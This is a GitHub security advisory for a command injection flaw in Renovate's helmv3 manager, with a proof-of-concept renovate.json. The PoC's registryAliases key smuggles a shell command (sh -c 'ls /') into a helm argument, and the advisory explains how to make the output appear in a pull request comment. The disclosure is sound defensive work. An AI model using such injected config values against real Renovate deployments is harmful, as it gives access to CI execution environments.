Skip to content

Renovate vulnerable to arbitrary command injection via helmv3 manager and registryAliases

Moderate severity GitHub Reviewed Published Apr 23, 2024 in renovatebot/renovate • Updated Apr 23, 2024

Package

npm renovate (npm)

Affected versions

>= 37.158.0, < 37.199.0

Patched versions

37.199.0

Description

Summary

Attackers with commit access to the default branch of a repo using Renovate could manipulate helmv3 registryAliases to execute arbitrary commands.

Details

Since #26848, registryAliases has become mergeable. This means that the helmv3 manager started honoring its value and uses a helm repo add <key> <parameters> command for each defined alias. See source code: https://github.com/renovatebot/renovate/blob/23f3df6216375cb5bcfe027b0faee304f877f891/lib/modules/manager/helmv3/artifacts.ts#L80
The key was not quoted, leading to the ability to use variable references ($FOO) in it and have them printed by Renovate on the pull request, or even running any shell commands.

PoC

Inside a repository where Renovate runs, add a Helm chart with an outdated dependency, for example:

test-chart/Chart.yaml:

apiVersion: v2
name: redis
version: 1.0.0
dependencies:
  - name: redis
    version: 18.13.10
    repository: oci://registry-1.docker.io/bitnamicharts

test-chart/Chart.lock:

dependencies:
- name: redis
  repository: oci://registry-1.docker.io/bitnamicharts
  version: 18.13.10
digest: sha256:11267bd32ea6c5c120ddebbb9f21e4a3c7700a961aa1a27ddb55df1fb8059a38
generated: "2024-02-16T13:31:20.807026334Z"

Then add the following renovate.json:

{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "extends": [
    "config:base"
  ],
  "registryAliases": {
    "foo/bar || sh -c 'ls /; exit 1' >&2": "registry.example.com/proxy"
  }
}

Once Renovate runs on the repository, it will create a pull request, and add a comment titled "Artifact update problem" containing the following text:

File name: test-chart/Chart.lock

Command failed: helm repo add foo/bar || sh -c 'ls /; exit 1' >&2 registry.example.com/proxy --force-update
Error: "helm repo add" requires 2 arguments

Usage:  helm repo add [NAME] [URL] [flags]
bin
boot
dev
etc
go
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

This shows that the ls command executed successfully, and we can even see its output.

Note that redirecting any output you want to see to stderr (>&2) and making sure the final command fails (exit 1) is required in this case, as Renovate only adds a comment if the command fails, and it contains only stderr (not stdout) output.

Impact

All Renovate versions from 37.158.0 up until 37.199.0 were affected. This vulnerability allows full access to Renovate's execution environment. The level of severity depends on how Renovate is deployed (Docker, Kubernetes, CI pipeline, ...) and whether Renovate is being offered to untrusted users/repositories.

References

@rarkins rarkins published to renovatebot/renovate Apr 23, 2024
Published to the GitHub Advisory Database Apr 23, 2024
Reviewed Apr 23, 2024
Last updated Apr 23, 2024

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Weaknesses

CVE ID

No known CVE

GHSA ID

GHSA-rqgv-292v-5qgr

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.